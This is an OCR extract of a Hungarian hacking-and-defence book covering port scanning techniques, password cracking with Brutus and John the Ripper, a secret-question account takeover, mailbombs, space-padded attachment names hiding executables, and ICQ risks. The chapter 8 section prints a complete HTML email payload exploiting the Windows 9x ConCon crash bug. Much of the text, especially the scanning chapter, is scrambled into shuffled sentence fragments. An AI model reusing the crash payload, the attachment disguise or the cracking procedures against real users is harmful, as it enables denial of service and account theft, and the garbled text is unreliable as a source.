A szkennelés az egyik legfontosabb módszer egy rendszer gyenge pontjainak a felismerésére. hogy kitalálják. A portszkennek a támadók legfontosabb eszközei. és kérdéses lenne. akkor SYN-ACK. RST-ACK. hogy a rendszergazdák ellenőrizzék rendszerük biztonságát. lehetségesek-e anonim loginek. Ehhez minden fontos információ megtalálható a 3. Ezért minden rendszergazdának jól kell ismernie a szkennereket. Hogy ezek közül melyiket választják. mert nagyon feltűnő. Ezen a módon persze nagyon sokáig tartana minden kapcsolatot felépíteni és azután befejezni.mindkettő a Linux alatt gyökerezik.6 Szkennelés . Ha a szkennelt számítógép biztonsági és felügyeleti státusza csekély. de időközben már Windowshoz is kifejlesztették. és visszadják a rendszer válaszait. A legismertebb szkennerek közé tartozik a Nessus és az nmap . Az mindenesetre biztos. No persze nem a hagyományos értelemben vett szkennelésről van szó. illetve portját szólítják meg. A támadóknak azonban nem felel meg. mielőtt munkához látna. Ha a szkenner ezeknél a kísérleteknél egy porttól feleletet kap. akkor az elérhetőnek számít. 6. a hacker pedig észrevétlen szeretne maradni.2. Éppen ezért a szkenner multi-socket eljárást alkalmaz. hogy milyen szolgáltatások futnak a rendszeren. és hogy megkövetelik-e a hitelesítést a hálózati szolgáltatások. amelynek a célja TCP alapú szervizeket/szolgáltatásokat találni. A következő magyarázatok feltételezik a közkedvelt protokollok alapismereteit. A szkenner A szkenneléshez szükség van egy portszkennerre. és a kapcsolat létrejött. fejezetben. hogy nagyon gyorsan vezet eredményre. hiszen e szó jelentés itt az. lehetőleg gyorsan. ha nem érhető el a port.2 Félig nyitott TCP-szkennelés A félig nyitott szkennelésnél nem állítanak elő teljes kapcsolatot a hosthoz. ha elérhető.2. és nagy valószínűséggel a támadó IP-címe is beíródna a rendszer logfájljaiba. 6. hogy minden portot le lehet-e szkennelni.A rések keresése 6. 6.2 Szkennelési eljárások Egy rendszer szkennelésére különböző lehetőségek kínálkoznak. Emellett a portszkennelés arra is szolgál. akkor nem fogják észrevenni ezt a szkennelést. amelyek mellett a feladatot meg kell oldani. hogy minden időkeretet túllépne. hogy egy rendszer minél több csatolófelületét. akinek root-jogai . az azoktól a feltételektől függ.1. különben nehezen érthetők az összefüggések. Ennek az eljárásnak az előnye. Az előnye viszont. hogy Unix alatt csak az tud végrehajtani ilyen eljárást. amelynél egyidejűleg nagyon sok kérdést tud feltenni. Ehhez a következőképpen járnak el: a szkenner. A szkennerek kérdéseket küldenek a portoknak. illetve a kliens megpróbál teljes kapcsolatot felépíteni a host minden portjához. Ebben az esetben a szkenner ismét ACK-val válaszol. A rendszer minden jogosultságával rendelkező rendszergazda teljes áttekintést szeretne kapni. melyek engedik meg kapcsolat felépítését. Minden hacker elvégzi a portszkennelést a célrendszerén. A szkenner egy TCP/IP csomagot küld SYN-flaggel a számítógépnek (a flagek [zászlók] speciális ismertetőjelek a csomag TCP-headerében). a host visszajelzése pedig. többek között arról. Közben különböző információkat gyűjtenek. hanem a SYN-ACK megerősítés után egy elérhető sockettől RST-ACK-val rögtön megszakítják a kapcsolatot.1 Szkennelés teljes TCP-kapcsolattal Itt egy olyan szkennelési eljárásról van szó.

illetve darabolódnak. ezért lehet a TCP-FIN szkennel könnyen kideríteni a nyitott portokat. A szkennelésnek ez a módja nagyon hosszadalmas. a támadó utánanéz a megfelelő kihasználási lehetőségeknek. amelynél csak azok a userek kapnak pozitív visszajelzést. 6. Csak a lezárt port küld vissza egy üzenetet.6 UDP-Recvfrom-And-Write szkennelés Ellentétben a UDP-ICMP-PORT-UNREACH szkenneléssel. és gyakran megbízhatatlan. Ehhez egy ICMP-ECHOcsomagot vagy egyszerűen egy pinget küldenek kölönböző IP-címekre. akkor többnyire ezt az üzenetet kapjuk: Error 13 . 6. hogy a port nem elérhető. A háttérben ismét egy bug áll: ha megpróbálunk egy portra írni. megkapják az ICMP PORT UNREACH üzeneteket. nem igazolja vissza a fogadást. hogy nem fogja-e egy tűzfal felfedezni a portszkennelést.13-as hibánál a port le van zárva. A lezárt portok RSTcsomaggal válaszolnak a FIN-csomagra.3 TCP-FIN-Scan A TCP-FIN szkennelést a Unix alatti TCP-implementációk többségének egy hibája (bug) teszi lehetővé.) futnak a rendszeren.Try Again. hogy milyen szervizek (FTP. hogy mégis kapjunk informatív visszajelzést . a Microsoft operációs rendszereknél a TCP-implementációnak nincs ilyen fajta hibája. amelyek nem feltűnőek.4 Fragmentált szkennelés A fragmentált szkennelés a TCP-szkennelések egy további módja. HTTP. hogy egy ICMP echo scanning/ping szkennelést hajtanak végre. . hogy melyik hostok elérhetők.2. egyszer. a UDP-Recvfrom-And-Write szkennelés egy normál módon bejelentkezett felhasználónak is lehetővé teszi. és azok a felhasználók.Connection refused üzenet helyett. Ennél a TCP-csomagok több kis csomagra fragmentálódnak. Megvan tehát a cél. Ez gondoskodik ugyanis arról. HTTPS. Ezen a módon lehet meggyőződni arról. A támadók most hozzákezdenének információkat gyűjteni a célrendszerről. amelyik a UDP-ICMP-PORT-UNREACH szkennelésre ICMP-PORT-UNREACH választ adott (amiről normál felhasználóként nem értesülünk). Telnet. hogy milyen portok nyitottak és milyen operációs rendszer van telepítve. amely a számítógépen fut. 6. hiszen system admin jogok kellenek hozzá.7 ICMP-echo-scanning/ping-szkennelés A szkennelésnek ez a módja csak azt állapítja meg. A szkennelésnek ez a módja azok közé a csekély számú eljárások közé tartozik. Ha a számok valamelyike mögött van egy rendszer. A szkennelendő portra egy TCP-csomagot küldenek egy FIN-csomaggal. Ez az operációs rendszernél kezdődik. a normál Error 111 . és várunk egy UDP-ICMP-PORT-UNREACH üzenetre. amit sajnos. Természetesen ez az eljárás is nagyon időigényes. Ráadásul csak Linux alatt működik.2. akik rootként vannak bejelentkezve. hogy a hálózatokban az erre jogosult rendszeradminisztrátoron kívül senki se tudjon végrehajtani ilyen szkennelést alacsonyabb jogokkal. Ennél az eljárásnál tehát minden portot kétszer szkennelnek. Tehát szkenneljük a portokat. a nyitottak ezt nem teszik. akkor egy portlista segítségével lehet áttekintést kapni arról. Aszerint.2. 6. Ezek a „letapogatások" azonban csak Unix alatt működnek. stb. mielőtt még egy megtalált rendszeren el lehetne indítani a tulajdonképpeni portszkennelést. és másodszor. Ezeket a szkenneléseket csak a rendszergazda tudja elvégezni.2. és a pontossága nagy mértékben a szkennelt számítógép kihasználtságától.8 A nyitott portok csak a kezdetet jelentik Ha találtatott egy rendszer nyitott portokkal. más protokollokkal ellentétben. hogy a fennálló kapcsolatot annak rendje és módja szerint bezárják. akik rootként vannak bejelentkezve. nem látunk. hogy a számítógép kiadjon egy választ. illetve rendszererőforrásaitól függ. az ICMP-ECHO-REPLY csomaggal válaszol.2. hogy „érdekes" jelzéseket kapjon. hogy találjanak egy hostot.2. 6.5 UDP-lCMP-Port-Unreachable szkennelés Az UDP. Ez azt jelenti. amelyen a támadó a legkülönbözőbb szkennelésekkel réseket kereshet. A FIN-csomagokat arra használják.vannak. 6.

hogy azonosítani lehessen a lehetséges támadót. mielőtt még hozzákezdene a tulajdonképpeni támadáshoz. amelyek nélkül a betörés lehetetlen volna. vagy portscan detektorok. hogy ne kínáljunk támadási felületet. inaktívan kellene tartani.2. Ezen keresztül számos fontos információt begyűjthetnek. és megpróbálkoznak egy portra kapcsolódni. ha a szkennelés nem talál nyitott portokat. hogy figyelmeztető üzenetet küldjenek. Itt a tűzfalak segítenek. hogy megtalálják és analizálják a célrendszerüket. illetve naplóztatni a szkenneléseket. ha valaki például egy FTP-szervert működtet a rendszerén. port elérhetőségét (lásd. vagy egy csatlakoztatott hálózat miatt biztosítania kell a 139.6. Naplóz a Norton Internet Security A tűzfalaknak olyan protokoll-funkcióik vannak. amint TCP-kapcsolatok érkeznek be. . mint például a BlackICE. A legjobb védelem. Tehát minden szolgáltatást. Ezért fontos védekezni a portszkennelés ellen. A tűzfalakat arra is be lehet állítani. a Windows-megosztásokat a Windows-rendszerek gyenge pontjairól szóló fejezetben). hogy egy rendszert szkenneljen. ameddig lehetséges. amelyek feljegyzik a portszkenneket. Ez azonban többnyire nehezen kivitelezhető. Természetesen nagyon nehéz valakit visszatartani attól. amelyet a betörők végrehajtanak.9 A portszkennelés elleni védelem A szkennelés többnyire az első lépés. mint amilyen a Norton Internet Security. már akkor is.

4.4 External mód 7.1 7.4 Jelszavak megfejtése a John the Ripperrel 7. fejezet .4.2 Beállítások áttekintése 7.3 Incremental mód 7.Tartalom 7.4.4.jelszófeltöréssel ez is lehetséges Mire kell ügyelni a felhasználói oldalról? A jelszófeltörők 7.2 A szólista módszer 7.4.6 A jelszófájl Single Mode .3 Hackelt security-site .3.7.3.5 A John legfontosabb parancsai 7.4.1 Ismert felhasználói nevek jetszavainak a kitalálása 7.1 7.2 7.

A támadó először megnézte a GMX-titkos kérdést. hamar rájött. tehát tobias. amellyel a fontos adatok jelszó-tulajdonosoktól való megszerzését jelölik. A másik lehetőség: a jó szerencsében bízva egyszerűen megpróbálkozni néhány jelszóval. mivel az interneten és a helyi számítógépeken is gyakran védik jelszavakkal a fájlokat a jogosulatlan hozzáférések ellen. az a fejezet 7.de volt.haennle@gmx.thsecurity. A hacker most a webtárhely szolgáltatójától kapott mail-eket kereste. és látta. és a jelszóválasztás biztonságát a középpontba állítani. ahol a valódi tulajdonos a nevétől kezdve a telefonszámáig tulajdonképpen minden adatot hátrahagyott. illetve feltörésére különböző lehetőségek vannak. amelyekre a Social Enineeringhez szükség van. egy ismert biztonsági és trójai információs oldal.flieger@dmx. és máris büszke tulajdonosa lett egy GMX-accountnak. amelyeket senkinek sem adnánk meg önként. a „biztos jelszó" sem fog kimaradni. 7. De nem voltak mail-ek a szolgáltatótól. megváltoztatta a jelszót. Kutatás közben megállapítot- Itt egy honlap volt . mert a legtöbb felhasználó nagyon lazán veszi a jelszó kiválasztását. Itt a következő történt. amire szüksége volt ahhoz. hogy a kérdés mindkét postafióknál így hangzott: Mi a keresztnevem? Az oldalon megadott kontaktcímből. A legfontosabb azonban az. a www. mert a Puretec általában havonta egyszer mail-ben elküldi a számlainformációkat.7 Jelszófeltörés ta.denic.de) és a Puretec (www. hogy egy jelszó ne legyen túl egyszerű. Tehát ne hagyjuk. hihetetlen. A hackereknek változatlanul az okos jelszavas védelem jelenti az egyik legnagyobb akadályt. hogy milyen névről van szó.puretec.az első: várni pár napot egy mail-re a szolgáltatótól.1 Hackelt security-site jelszófeltöréssel ez is lehetséges Egy ismert példa a th-security „átváltozása" (deface) volt. így két lehetőség adódott . De ez biztosan feltűnne a felhasználónak.. Természetesen a jelszófeltörők elleni legjobb védelem. hogy a Pureteckel „elfelejtett" jelszavakat lehessen a kontaktcímre küldetni.de és pegasuss. A jelszófeltörésről oldalakat lehetne írni. amelyben a főnökünk keresztnevét kérdezik . hogy a webmesternek két GMX-fiókja van: tobias. amivel ilyenkor eljárnak. A kreativitás. Hogy hogyan is működnek ezek a programok. Tehát fogta Tobias-t. A hacker a felhasználó születési dátumával kezdett. És nézzenek oda: ez megint telitalálatnak bizonyult.kulcsszó: email-cím.de.de (a címeket az adatvédelem miatt megváltoztattuk). amelyen semmiféle scripthibát vagy szerverhibát nem lehetett találni. A jelszavak kiderítésére. amely egy lista segítségével minden lehetséges variációt megjátszik. a második a Denic-nél (www. Az egyik legfontosabb a Social Engineering. mert ezekben szerepelt az ügyfélszám. és megváltoztatná a kontaktcímét. A klasszikus jelszótörő egy olyan program.haennle@gmx. Az első címet kontaktcímként adta meg a weboldalon. amelyet a GMX-adatokból megtudott. Most egy kicsit körülnézett a GMX felhasználói menüben.de) szolgáltatónál szerepelt kontaktcímként. Ez történhet mondjuk egy telefonhívással. hogy ismeretlenek olyan információkat csaljanak ki tőlünk.3 pontjából derül ki. Hogy ezek után mit csinált az oldalból? íme az eredmény: Ez a fejezet a jelszavak biztonságosságát tárgyalja. Ezért itt csak a valóban fontos információkat szeretnénk bemutatni. Tehát a hackernek más eszközökhöz kellett folyamodnia. Az áldozat. amelyet egy m \ r3nda nevű hacker kinézett magának.

A jó jelszavak • több mint tíz karakterből. ehelyett egy névről nagyon jól ismert eljárást. . a Brute Force-ot használják. • alfanumerikus karaktersorból. A jelszót a legritkább esetben fejtik vissza. • semmi duplázás. az alkalmatlan jelszó révén. amelyek jelszavakat fednek fel. A Brute Force annyit jelent: nyers erőszak. Ezzel a fogással meghiúsíthatjuk a korábban kikémlelt jelszó felhasználását. Ezután ki lehet választani a támadás fajtáját.3 A jelszófeltörők A jelszófeltörők olyan programok. pl. amelyek benne lehetnek a jelszólistákban vagy a szótárakban. tehát ne legyen „hhaalloo". A titkos kérdések legyenek titkosak Az interneten a különböző oldalak biztonságra ügyelő szolgáltatói jelszókérdések vagy titkos kérdések megadását kínálják. mert így minden támadónak lehetővé tesszük a jelszavunk tetszés szerinti megváltozatását. mint nagyon nagy sebességgel próbálják ki az egyik lehetséges jelszót a másik után. amíg megtalálják az igazit. Telnet. A Target mezőbe be kell írni a kikémlelendő fél URL-jét vagy IP-címét. 7. A jelszavak megadásánál a következő alapszabályokat kellene betartani: • ne legyen öt karakternél rövidebb. • egy cetlit teszünk a billentyűzet alá vagy a monitorra. Ezért a rosszul választott jelszavak kihasználása a hackerek egyik legjobban elterjedt támadófegyvere. • a jelszó egy fájlban van mentve a gépen. és ráírjuk a jelszót. hogy ki kerüljék az alkalmazott biztonsági intézkedéseket. és szükség szerint szólistákat is be leA Brutus program: minden beállítás egy lapon Teljesen értelmetlen a jelszóhasználat. megváltoztatni a jelszavát. Gyakran lehet ilyen kérdésekkel találkozni: „Mi a hideg ellentéte?" Ez természetesen rossz választás. NetBios stb. hogy hogyan válik lehetségessé egy „deface" a rosszul megválasztott titkos kérdés.Ez bizony egy nagyon jó példa arra. Egy példa az ilyesfajta programra a Brutus. kml34Hs9.).2 Mire kell ügyelni a felhasználói oldalról? A legtöbb felhasználó nem túl ötletes egy értelmes jelszó kitalálásánál. • ne legyenek olyan szavak. ha elfelejtette. 7. • semmi születési dátum és hasonlók. A jelszót kettő-négy hetente cserélni kell. Az internetjelszavak minden fajtájához szívesen használják. ha • mindenütt ugyanazt a jelszót használjuk. • vegyesen kis. E programok nem tesznek mást. HTTP. POP3. • ne legyen szabványos. A Brutus jelszófeltörő internetaccountok valamennyi variánsához (FTP. hogy a felhasználónak lehetővé tegyék.és nagybetűkből állnak.

FTP-nél a 21-es. Pass Fik: words. Még ha a passwd fájlban az adatok „árnyékolva" is vannak (ez a bizonyos shadowing az újabb Linux/Unix verziók biztonsági intézkedése. mert az már ismert. amelyet előre meg lehet adni. akkor visszafejtve is egyezniük kell. SMB (NetBOIS) stb.net. és helyette a shadow-fájlban tárolja). ezért a program egyes verziói különböző processzorokra optimalizáltak. Single User: kiválasztva User ID: usernév (pl. Egy további. A DES-kódolások felhasználásának egyik területét a Unix-jelszavak jelentik. Use Proxy: nincs kiválasztva. a POP3 vagy FTP-account van. Port: a port megadása. hogy a megadott jelszólehetőségeket például DES-sel kódolja. HTTP esetén a 80-as port.).4 Jelszavak megfejtése a John the Ripperrel A John the Ripper egy jelszófeltörő.1 Ismert felhasználói nevek jelszavainak a kitalálása Mint már a neve is mutatja. incremental. Pass Mode: szólista. 7. amelyek.txt. ha elfelejtettük a fiók-jelszavunkat. aszerint. Timeout: megadható. Connection: meg lehet adni. a rendelkezésre álló processzor sebességétől függ. HTTP. itt lehet kiválasztani. a támadásokhoz hasznos tulajdonság egy beépített proxy. amely úgy működik. POP3. Telnet. szólista. Use Username: kiválasztva. Ha a jelszavak kódolt állapotban egyeznek. external).. de nincs meg a hozzá tartozó jelszó. hogy mennyi idő múlva szakítsa meg a program a kapcsolatot. Így lenne ez például akkor is. jelszóként felhasználni. a .1 Single Mode Ebben a módban a John megpróbálja a jelszófájlban tárolt GECOSinformációkat (General Electric Comprehensive Operating System). Fercsi stb. Itt lehet egy névlistát választani különböző user nevekből. A John the Ripper szerény felhasználói felülete 7. Itt lehet egy szólistát betölteni. amely megakadályozza. telefonszám stb.3. A John működése azon alapul. amely DES-sel (Data Encryption Standard) kódolt jelszavakat tud dekódolni. amelyre John the Rippernek szüksége van a jelszavak visszafejtéséhez. hogy a jelszavakat eltávolítja a passwd fájlból. hogy vissza lehessen követni a támadót.het tölteni. hogy milyen módban indult el (single. amelyeket a Brutus mellékel. amelyet a Brutus mellé adnak. hogy milyen gyakran létesítsen kapcsolatot a program. amelyen pl. combo-listával vagy Brute Force-szal. 7. Lehet szólistával. ha a jelszó a listán van. a Brutus itt lehetővé teszi egy proxy bejegyzését. például név. FTP. Az idő. igencsak megrövidítik a feltörést. hogyan történjen a feltörés.4. a program ennél az eljárásnál csak egy user névvel próbálkozik. Type: itt lehet kiválasztani a cél típusát. Jóska. Method: HEAD KeepAlive: megjelölve. mert mindkettőnél ugyanazt a kódolási eljárást (DES) alkalmazták. pl: lol@gmx.2 Beállítások áttekintésére Target: a host URL-je vagy IP-je. és az eredményt összehasonlítja a megfejtendő jelszóval.3. 7. azaz a userek személyes adatait.

a szólista német részét ebben az esetben el lehet hagyni. ezért a jelszavakat és a GECOS-információkat megint csak egyetlen fájl tartalmazza. a USERNAME: PASSWORD séma szerint kell tárolni. végül incremental módban futtatja le a Johnt. Ez a parancs external módban indítja a Johnt.3 Incremental mód Ez a John leghatalmasabb üzemmódja. Ez a parancs szólista módban indítja a Johnt. az nem túl lényeges.5 A John legfontosabb parancsai Parancs Leírás Ez a parancs single módban indítja a Johnt.6 A jelszófájl Ennek a fájlnak tartalmaznia kell a megfejtendő jelszavakat a hozzájuk tartozó felhasználó-nevekkel. vagy eltávolítják a dupla bejegyzéseket). Minden parancs után meg kell még adni a jelszófájlt is. 7. mégpedig úgy. 7. A szólistát úgy kell felépíteni.4. Arra is ügyelni kell. Ha a single módot kell használni. Ebben az esetben az Unshadow program segít. És éppen ez adja ennek az eljárásnak a erősségét: mivel valószínűtlen. ha a felhasználók személyes információikat használják jelszóként. 7. Ez a parancs incremental módban indítja a Johnt. hogy egy ausztráliai szerver passwd fájlja német jelszavakat tartalmaz. így lehet szerver.ill.4. amelyek a szólisták kezelésében segítenek. hogy a szükséges idő (a processzor teljesítményétől. 7. Hogy hány ilyen pár van a fájlban tárolva. Minden létező jelszót. Ezt az eljárást Brute Force-nak is nevezik. Ez a módszer egyben nagyon gyors is. Azt mindenesetre figyelembe kell venni. Ezeket kettősponttal elválasztva. vissza tud fejteni úgy. számokból vagy kombinációkból áll.4 External mód Ez a mód inkább tapasztalt felhasználóknak való. hogy betűkből. ezért nem szabad alábecsülni.4. hogy egy sorban mindig csak egy USERNAME:PASSWORD pár legyen. hogy a szólista ábécé-sorrendben legyen. majd szólista. Erre a parancsra mutatja meg a program a megfejtett jelszavakat. A jelszavak „árnyékolva" sem lehetnek. különleges karakterekből. akkor a GECOS-információknak és a user-könyvtár elérési útvonalának is mögötte kell állnia ( p l : john:OozDCtCCAa/lM:11202:0:99999:7:0:).4. és ezzel a siker valószínűségét növelni. mert minden felhasználó GECOS-információját az összes többinél is kipróbálja jelszóként. függetlenül attól. kódolva=john:GjstuOeYjOEhc). mert minden rendkelkezésre álló információt fel lehet használni. John fájlnév John -show Ez a parancs először single. csak arra kell figyelni. mert teljes mértékben konfigurálni kell. a LIST. hogy minden lehetséges kombinációt ellenőriz. hanem normál kódolt állapotban kell lenniük (pl: árnyékolva= john:x vagy john:* . adminspecifikus szólistákat előállítani. . ábécé-sorrendbe rendezik. a jelszó hosszától és a jelszóban használt karakterektől függően) nagyon hosszú is lehet. EXTERNAL: előtt definiált MODE tulajdonságokkal. Ez a mód természetesen csak akkor hatékony. Ennek a módnak a hatékonysága a jelszófájl tartalmazta felhasználók számával növekszik. hogy minden sorban csak egyetlen karakterfüzér legyen. A John the Ripper legfontosabb parancsainak az áttekintése John -single John -i John -w:aszólistaneve John -e:MODE 7.2 A szólista módszer Ennek a módszernek a hatékonysága teljes mértékben a felhasznált szólista méretétől és főleg a minőségétől függ. hogy összevezeti a passwd fájlt és a shadow fájlt. például több listát összefűznek.GECOS-információk azonban még mindig a passwd fájlban vannak. A john parancs kilistáz minden lehetséges paramétert.4. ha az egymás után következő szavak vagy karaktersorozatok nem különböznek túlzottan egymástól (vannak programok. mert a John egy kicsikét gyorsabban dolgozik.

2 ICQ .1.2 Milyen biztonsági rések vannak? .2.praktikus és veszélyes 8.1 Az ICQ . fejezet .8.3 AConConbug 8.2.1.1 Mailbombák .1 E-mail-támadások 8.biztonsági kockázat? 8.2 A fájlmelléklet kitömése 8.1.túlcsordul a postafiók 8.Tartalom 8.

amelyeknek fontos kommunikációs eszközt jelent az internet. Ennek alapján nem nyújtanak lehetőséget arra.1. Az interneteléréssel azonban növekednek azok a veszélyek. A legtöbbek életéből már nem maradhat ki ez a médium.1 E-mail-támadások Az e-mailek a legfontosabb kommunikációs bázist jelentik az interneten. aki nem kapja meg a megrendelés-maileket. inkább csak idegölők és zavarók. Ugyanis elég időigényes . hogy a címzett postafiókja hamar túllépi a maximális kapacitását. hogy anonimek maradnak. és a tartalmak is mind vonzóbbakká válnak.8 Támadások az internet-felhasználók ellen Az internetet használók száma folyamatosan növekszik. 8. sőt még arra is van mód. A mailbombázáshoz a támadók számos programból választhatnak. mivel a mailbox a támadás miatt túltelítődik. Ebben a tényben azonban veszélyek is rejlenek.és drága . ezt pedig a hackerek kihasználják a rendszerek megtámadásához. A támadó anonim marad Hogy a mailbomba-támadások áldozatai nem tudnak közvetlenül a tettesekre támadni. ha tudják. hogy a mailbomba-támadások mögött mennyire van stratégia. Ezek az adatátviteli protokollok az ASCII karakterkészletre korlátozzák a tartalmukat. S bizony roppant időrabló ténykedés eltávolítani a többnyire különösebb tartalom nélküli mail-ek százait. hogyan és milyen változatokban hajtanak végre támadásokat felhasználók ellen. Képzeljük csak el egy online bolt üzemeltetőjének a helyzetét. Ezt ugyanis. és nem tud több mail-t fogadni. amelyek sok felhasználóban nem is tudatosulnak. Kiderül. Ez a fejezet az internet-használat veszélyeinek és kockázatainak reálisabb felbecsülésében próbál segíteni. Egy egyedi felhasználónak főleg az idejét rabolhatják a bombázással. hogy egy fontos mail-re vár. az a mailbombázók által gyakran használt SMTP és Telnet internetprotokollok (lásd az Alapok fejezetet) felépítésén múlik. amelyeknek a saját PC-nk vagy akár a hálózat is ki van téve. hogy a feladó adatait ellenőrizni lehessen.és víruslehetőségekről itt már nem beszélünk.túlcsordul a postafiók A mailbombák nem jelentenek közveden veszélyt az internet-használók adataira vagy saját számítógéprendszereikre. Nehéz felmérni. Egy ilyen támadás azonban akár pénzügyileg is érinthet kisebb cégeket.lehet.választás szerint hamis feladócímet is meg tudnak adni. 8. hogy valaki hamis feladócímet adjon meg! A mailbombázók sajátos képességei tehát nemcsak abban nyilvánulnak meg. ha az embernek hirtelen 5000 nem kívánt mail-t kell törölni a postafiókjából. hanem abban is. tehát csak egyszerű szöveget szállítanak. ezeket az adott témának szentelt fejezetek tárgyalják. akkor bosz- . E-mail-bombázó Arzytól szánthatják. hogy szinte egyidejűleg hallatlanul nagy számú mail-t tudnak küldeni a kívánt címre. vagy .1 Mailbombák . A különböző trójai. Itt elsősorban az e-mailek és az ICQ biztonsági kockázatairól lesz szó. egyre újabb és újabb szolgáltatásokat kínálnak a számukra. Ennek természetesen az a következménye. mert mailbomba-támadás áldozata lett. a szerver vissza fogja utasítani.

Ezáltal az egyes mail-szerverek túlterhelésének a kockázata is csökken. A csatolt fájl. 8. az úgynevezett spam-et. hogy az *. hogy először mentsük merevlemezre és ellenőriztessük vírusvizsgálóval az ismeretlen forrásból származó mail-ek csatolt fájljait.így működnek a mailbombák Ahhoz. Ráadásul egy ilyen tranzakció egyeden szerveren keresztül talán túl feltűnő lenne. Ezt egyébként azért teszik.doc-ot mutatja.EXE. így a felhasználó feltételezheti. Ártatlannak tűnik . a mailbombázó programoknak több szerverrendszert is meg kell adni. az akaratuk ellenére. mint a Sub7 (lásd a trójaiakról szóló fejezetet). hogy a nyilvános ismeretterjesztés hatására sok felhasználó már tudja. hogy a címzetteknek továbbítsák a mail-eket. A szervezett mailbomba-akciók ezeknek a cégeknek a mail-postafiókjaira gyakran sikeresnek bizonyultak! Ezért a legtöbb mailszolgáltató ügyfél-postafiókjain ki lehet választani az antí-spam opciót.BAT nevű mail-mellékletek veszélyesek lehetnek. Általánosságban érvényes. amit közvetlenül is meg lehet nyitni az Outlookból. hogy álcázzák a csatolt fájlt. A felhasználó tehát figyeljen a megfelelő ikonra! Persze az elszánt hacker az olyan programokkal.COM. a következőképpen néz ki: Profil. postásként fognak működni. amelyek agresszív reklámjaikkal tűnnek fel az interneten. hogy az elképesztő tömegű mail egyáltalán továbbítódjon a felhasználóhoz. Ezért gyakran egy trükkhöz folyamodnak. A csatolt fájlok elleni védelem A fent bemutatott fájlmellékletet nyilvánvalóan nem a Word dokumentum ikonja jelöli. Ezen kívül a Microsoft a http://windowsupdate. és feltelepül az esetleg hozzáfűzött vírus vagy trójai. mint az AOL vagy a GMX. megkérdőjelezhető fájlcsatolásoknál Mailbomba-védelem A német online szolgáltatók. s a további mail-akciókat zárolni lehetne erről a szerverről! Az utóbbi időben egyre több mailbomba-támadás összpontosít cégekre. *. Természetesen ebben az esetben azonnal elindul a megfelelő program. hogy előzőleg a merevlemezre kellene menteni. felhasználói biztosan jól ismerik az előbb említett mailreklámot.microsoft.2 A fájlmelléklet kitömése Vírusok és trójaik küldésénél a hackerek állandóan szembesülnek azzal a problémával. hogy felgyorsítsák az akár 10 ezer mail továbbítását.egy mail kipufferolt fájlmelléklete . amely még a mail-hez csatolt fájlok futtatása előtt figyelmeztetést küld a gyanús fájloknál. a merevlemezre mentve.com/ címen egy Outlook-frissítést is kínál. Figyelmeztető üzenet az Outlooktól. anélkül. és a munkát felosszák több különböző szerver között. *.1. hogy csak egy hagyományos Word-dokumentumról van szó. Ez megakadályozza.doc exe A hosszúsága miatt (amit az üres karakterek okoznak) az Outlook csak a Profil. amelyek. még Word-ikont is tud varázsolni.

gif> <P>Üzenetet ide beilleszteni. font-weight: regular. "Ariar.8. Az is ismert.</P></CENTER></BODY></HTML> ConCon-mailnézet egy erre a búgra rezisztens Windows 2000rendszeren color: FF3300. font-weight: regular. hogy ennek a hibának a többszöri fellépése kárt okozhat a Windows kernelben.</DIV> <CENTER><IMG align=3Dcenter alt=3D"Elfuthatsz. } ? { </STYLE> <META content=3D'"MSHTML 4. font-size: 20pt.=20 } hl . BR. "Arial". "Comic Sans MS". amely a foglalt eszköznevek meghívására vonatkozik. OL. MENU. UL. Ez veszélyes lehet a nem mentett adatok miatt. DIV. "Comic Sans MS".de=20 width=3D617></CENTER><BR><BR><BR> <CENTER> <Hl>Elfuthatsz. Egy példa erre a híres Windows ConCon bug. font-family: "Tempus Sans ITC". PRE. BLOCKQUOTE. hogy újra kell installálni az operációs rendszert. de el nem menekülhetsz=20 előlem!<TOPMARGIN=3D1 50></H1Yó></CENTER><BR><CENTER> <IMG src= "\C: \Con \Con. aminek az a következménye.3 AConCon bug A csatolt fájlok mellett a mail-éknek is lehet veszélyes tartalmuk. DT. font-family: "Tempus Sans ITC". amelyek például így nézhetnek ki: <!DOCTYPE HTML PUBLIC "-//W3C//DTD W3 HTML//EN"> <HTML> <HEAD> <META content=3Dtext/html. ADDRESS. font-weight: regular.3110. Ez a Windows 95/98/98 SE Windows kernelének egy hibájára épül.1.72.7"! name=3DGENERATOR> </HEAD> <BODYbgColor=3D#99ccffleftMargin=3D30topMargin=3D5> <DIV>&nbsp. A ConCon „nagy kék halált" okoz. "Arial". A ConCon mail-ékben terjed beágyazott HTML-fájlokon keresztül. P. DD. és újra kell indítani a PC-t. font-size: 30pt." height=3D116=20 src=3Dcid:005001bfc591$8d8c9fOO$23b02fd5@lol. font-size: 24pt. DIR.=20 } hl { color: FF3300. "Comic Sans MS".telekabel. font-family: "Tempus Sans ITC".charset=3Diso-8859-l = http-equiv=3DContent-Type><BASE=20 href=3Dftle://C: \Con \Con \> <STYLE> <'body. = LI { color: FF3300.

amikor bejelentkezik a kommunikációba.asp?ReleaseID=193 89 címen a Microsofttól letölthető egy patch a bug kijavításához. az Offline. 2. A kapcsolati listára minden felhasználót bejegyezhetünk. és a gép lefagy. A státuszon lehet látni. hogy ki van onlineban. mert túl veszélyes".microsoft. az Away és az Invisible. hogy pillanatnyilag békén hagyják. Ha egy másik felhasználót keresünk. hogy a támadónak információkat szolgáltat az áldozatról. Ráadásul az ICQ-t ért különböző remote-buffer-overflow-k és DoStámadások is ismertek. Az ICQ-kliensen egy session közben megváltoztathatjuk a saját státuszunkat. 2000b ICQ-pager-értesítés egy Sub7 szerveren ICQ message-window 8. Az ICQ legnagyobb veszélye tulajdonképpen abban rejlik.1 Az ICQ . a Mailbombák alatt. amelyeknél a támadó üzenetek sokaságával bombázza az áldozatot (lásd ebben a fejezetben. vagy egyszerűen a UIN.biztonsági kockázat? Az utóbbi időben elszaporodtak azok a vélemények. hogy „Nem. az e-mail címét vagy a UIN-t. hogy a számítógép lefagyjon. hogy kinek adnak engedélyt és kinek nem a kontaktlistájukhoz. Azok a támadások is kedveltek. és a kérdésre. mint magán az ICQnetworkön. az IRC (InternetRelayChat) mellett az internet egyik legtöbbet használt chatrendszerévé fejlődött. Windows ICQ Client v. a választék az Online. . és a támadóknak szállítják a megfelelő információkat. és kapcsolatba léphetünk vele. akikkel rendszeresen szeretnénk kapcsolatot tartani.Ezt a mailt elég kijelölni és belenézni. miután nagyon kényelmes és felhasználóbarát. Így a rendszer nem tud elindulni. de az interneten egyre több program található.4. 1. amely. hogy csak a fontosabbakra szorítkozzunk. mert a felhasználókat a UIN-on keresztül tudják más felhasználók megtalálni és azonosítani. Tulajdonképpen a címünkhöz vagy az IP-nkhez hasonlítható. egyszerűen a Find User alatt megadjuk a nevét. Az 